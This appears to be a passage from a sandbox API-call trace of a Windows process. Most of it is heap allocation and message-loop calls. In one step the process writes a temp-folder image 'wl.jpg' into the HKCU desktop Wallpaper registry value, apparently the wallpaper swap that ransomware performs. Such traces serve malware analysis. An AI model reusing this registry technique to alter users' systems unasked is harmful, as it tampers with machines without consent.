[0280.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0280.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0280.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0280.716] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0280.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0280.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0280.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0280.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0280.716] timeGetTime () returned 0x1186531 [0280.716] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0280.716] Sleep (dwMilliseconds=0xa) [0280.785] timeGetTime () returned 0x1186576 [0280.786] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0280.786] Sleep (dwMilliseconds=0xa) [0280.855] timeGetTime () returned 0x11865bc [0280.855] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0280.855] Sleep (dwMilliseconds=0xa) [0280.933] timeGetTime () returned 0x118660a [0280.934] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0280.934] Sleep (dwMilliseconds=0xa) [0281.057] timeGetTime () returned 0x1186686 [0281.057] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0281.058] TranslateMessage (lpMsg=0x8cf798) returned 0 [0281.058] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0281.058] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0281.058] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0281.058] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.058] Sleep (dwMilliseconds=0xa) [0281.142] timeGetTime () returned 0x11866dc [0281.142] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.142] Sleep (dwMilliseconds=0xa) [0281.207] timeGetTime () returned 0x118671b [0281.207] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.207] Sleep (dwMilliseconds=0xa) [0281.271] timeGetTime () returned 0x118675c [0281.271] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.271] Sleep (dwMilliseconds=0xa) [0281.320] timeGetTime () returned 0x118678c [0281.320] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.320] Sleep (dwMilliseconds=0xa) [0281.358] timeGetTime () returned 0x11867b3 [0281.358] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.358] Sleep (dwMilliseconds=0xa) [0281.498] timeGetTime () returned 0x118683f [0281.498] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.498] Sleep (dwMilliseconds=0xa) [0281.545] timeGetTime () returned 0x118686d [0281.545] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.545] Sleep (dwMilliseconds=0xa) [0281.585] timeGetTime () returned 0x1186897 [0281.585] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.585] Sleep (dwMilliseconds=0xa) [0281.623] timeGetTime () returned 0x11868bb [0281.623] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.623] Sleep (dwMilliseconds=0xa) [0281.671] timeGetTime () returned 0x11868eb [0281.671] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.671] Sleep (dwMilliseconds=0xa) [0281.706] timeGetTime () returned 0x118690f [0281.706] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0281.706] Sleep (dwMilliseconds=0xa) [0281.744] timeGetTime () returned 0x1186935 [0281.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0281.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0281.745] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0281.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0281.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0281.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0281.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0281.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0281.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0281.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0281.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0281.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0281.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0281.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0281.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0281.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0281.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0281.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0281.746] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0281.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0281.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0281.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0281.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0281.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0281.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0281.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0281.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0281.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0281.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0281.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0281.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0281.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0281.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0281.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0281.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0281.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0281.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0281.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0281.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0281.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0281.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0281.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0281.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0281.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0281.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0281.747] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0281.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0281.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0281.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0281.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0281.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0281.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0281.748] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0281.748] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0281.749] RegCloseKey (hKey=0x2d0) returned 0x0 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0281.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0281.750] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0281.750] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0281.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0281.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0281.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0281.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0281.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0281.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0281.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0281.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0281.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0281.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0281.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0281.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0281.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0281.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0281.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0281.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0281.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0281.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0281.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0281.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0281.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0281.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0281.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0281.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0281.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0281.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0281.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0281.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0281.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0281.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0281.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0281.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0281.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0281.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0281.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0281.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0281.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0281.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0281.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0281.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0281.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0281.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0281.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0281.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0281.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0281.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0281.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0281.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0281.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0281.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0281.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0281.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0281.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0281.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0281.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0281.755] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0281.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0281.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0281.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0281.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0281.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0281.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0281.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0281.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0281.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0281.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0281.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0281.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0281.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0281.792] 